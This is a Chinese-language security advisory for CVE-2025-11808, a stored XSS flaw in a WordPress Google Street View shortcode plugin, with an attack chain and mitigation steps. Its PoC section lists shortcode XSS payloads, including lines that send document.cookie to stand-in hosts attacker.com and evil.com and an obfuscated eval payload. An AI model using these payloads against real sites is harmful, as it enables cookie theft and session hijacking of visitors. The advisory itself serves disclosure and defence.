CVE-2025-11808 WordPress Google Street View插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-11808

漏洞类型

存储型跨站脚本攻击（Stored XSS）

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Shortcode for Google Street View plugin for WordPress

漏洞概述

CVE-2025-11808是WordPress平台上一款名为"Shortcode for Google Street View"插件存在的严重安全漏洞。该插件用于在WordPress网站中嵌入Google街景视图内容，版本0.5.7及之前的所有版本均受影响。漏洞的根本原因在于插件对'streetview'短代码中的'id'参数缺乏充分的输入验证和输出编码处理。攻击者利用此漏洞可以在网站的页面或文章中注入恶意JavaScript代码。由于该脚本会被永久存储在数据库中，所有访问受影响页面的用户都会自动执行这些恶意代码，从而可能导致会话劫持、敏感信息窃取、钓鱼攻击等严重后果。攻击者需要拥有WordPress网站的贡献者（Contributor）或更高权限即可利用此漏洞，这使得漏洞的利用门槛相对较低，危害范围广泛。

技术细节

该漏洞属于存储型跨站脚本攻击（Stored XSS），攻击流程如下：首先，攻击者登录WordPress后台并获得至少贡献者（Contributor）权限。然后，攻击者在创建或编辑文章/页面时使用streetview短代码，并通过id属性注入恶意JavaScript代码。例如：[streetview id="onerror=alert(document.cookie)//"]。由于插件在处理id参数时仅使用了不当的输入验证或完全未进行验证，同时在输出时缺少HTML实体转义，导致恶意代码被直接写入数据库。当其他用户访问包含该短代码的页面时，WordPress会从数据库读取内容并渲染页面，此时恶意脚本会作为页面HTML的一部分被浏览器执行。需要注意的是，WordPress本身对已发布内容有一定的权限控制，但贡献者角色可以发布和编辑自己的文章，这为攻击提供了可乘之机。修复后的版本应在输出前对所有用户可控参数进行htmlspecialchars()或esc_html()处理。

攻击链分析

STEP 1

步骤1

攻击者获取WordPress网站账号并获得至少贡献者（Contributor）权限

STEP 2

步骤2

攻击者创建或编辑文章/页面，在内容中插入包含恶意JavaScript代码的streetview短代码

STEP 3

步骤3

由于插件未对id参数进行输入验证和输出转义，恶意代码被直接存入数据库

STEP 4

步骤4

文章/页面发布后，任何访问该页面的用户浏览器会执行注入的恶意脚本

STEP 5

步骤5

恶意脚本执行后可窃取用户Cookie、会话令牌或其他敏感信息，甚至进行进一步的攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- WordPress Shortcode for Google Street View XSS PoC -->
<!-- Attacker with Contributor+ role can inject malicious script via shortcode -->

<!-- Basic XSS payload example -->
[streetview id='"><script>alert(document.cookie)</script>']

<!-- Alternative payload using onerror event -->
[streetview id='x' onerror='fetch("https://attacker.com/steal?c="+document.cookie)']

<!-- Stored XSS with image tag -->
[streetview id='"><img src=x onerror=eval(atob("YWxlcnQoJ1hTUycpOw=="))>']

<!-- Real attack scenario: Create new post with malicious shortcode -->
<!-- POST /wp-admin/post.php HTTP/1.1 -->
<!-- Content: post_title=Street View Test&content=[streetview id="onerror=document.location='https://evil.com/log.php?c='+document.cookie"]&post_status=publish

影响范围

Shortcode for Google Street View plugin for WordPress <= 0.5.7

防御指南

临时缓解措施

在官方补丁发布前，建议采取以下临时缓解措施：1）立即禁用或删除Shortcode for Google Street View插件；2）审查所有已发布文章，移除可能包含恶意代码的streetview短代码；3）如果必须使用该插件，可通过WordPress插件编辑器临时修改gsv-shortcode.php文件，在输出id参数时添加htmlspecialchars($id, ENT_QUOTES, 'UTF-8')转义；4）加强用户权限管理，限制谁可以发布和编辑内容；5）启用Web应用防火墙（WAF）规则来检测和阻止XSS攻击向量。